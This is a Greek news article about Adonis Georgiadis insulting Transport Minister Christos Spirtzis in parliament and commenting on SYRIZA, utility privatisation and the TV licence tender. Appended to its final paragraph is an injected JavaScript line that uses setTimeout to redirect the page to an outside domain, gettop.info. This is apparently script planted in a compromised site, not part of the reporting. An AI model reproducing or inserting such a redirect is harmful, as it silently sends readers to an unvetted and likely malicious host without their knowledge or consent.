Γεωργιάδης: Το ίδιο λαμόγιο παραμένει είτε Σπίρτζης είτε Σπρίτζης

0
22

 

Επίθεση στον υπουργό Μεταφορών Χρήστο Σπίρτζη εξαπέλυσε από τα έδρανα της Βουλής ο αντιπρόεδρος της ΝΔ Άδωνις Γεωργιάδης κατά τη συνεδρίαση των Επιτροπών για το πολυνομοσχέδιο, αναφερόμενος στο θέμα των τηλεοπτικών αδειών.

Όπως είπε μαινόμενος ο κ. Γεωργιάδης απαντώντας στην επισήμανση του Κώστα Μπάρκα, ο οποίος βρισκόταν στην έδρα, ότι ο υπουργός Μεταφορών λέγεται Σπίρτζης και όχι Σπρίτζης όπως τον αποκάλεσε στην ομιλία του ο αντιπρόεδρος της ΝΔ: «Το ίδιο λαμόγιο παραμένει είτε Σπίρτζης είτε Σπρίτζης. Να σηκωθεί να φύγει. Αρχιλαμόγιο όχι λαμόγιο».

Σήμερα, σε ραδιοφωνική του συνέντευξη στον ΣΚΑΪ 100.3 δήλωσε καυστικά πως «με τις πολλές ευγένειες δεν αντιμετωπίζεται ο ΣΥΡΙΖΑ», προσθέτοντας ότι «οι άνθρωποι αυτοί δεν έχουν τσίπα, δεν έχουν φιλότιμο».

Ο κ. Γεωργιάδης απαντώντας παράλληλα στη δήλωση του υπουργού Οικονομικών Ευκλείδη Τσακαλώτου χθες στη Βουλή ότι όσο είναι ο ίδιος υπουργός δεν θα ιδιωτικοποιηθούν οι ΔΕΚΟ, είπε ότι με το πολυνομοσχέδιο με τα προαπαιτούμενα που ψηφίζεται σήμερα στην Ολομέλεια οι ΔΕΚΟ θα ιδιωτικοποιηθούν από έναν επόμενο ΥΠΟΙΚ, χωρίς να ερωτηθεί καν η Βουλή.

Αναφερόμενος στις τηλεοπτικές άδειες, ο αντιπρόεδρος της ΝΔ είπε ότι «χάρη στην Τράπεζα της Ελλάδος» δεν μπόρεσε να βρει τα χρήματα ο εργολάβος Καλογρίτσας, ο οποίος τη Δευτέρα αποσύρθηκε από τον διαγωνισμό αφού δεν μπόρεσε να καταβάλει την πρώτη δόση για την άδεια που είχε λάβει. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here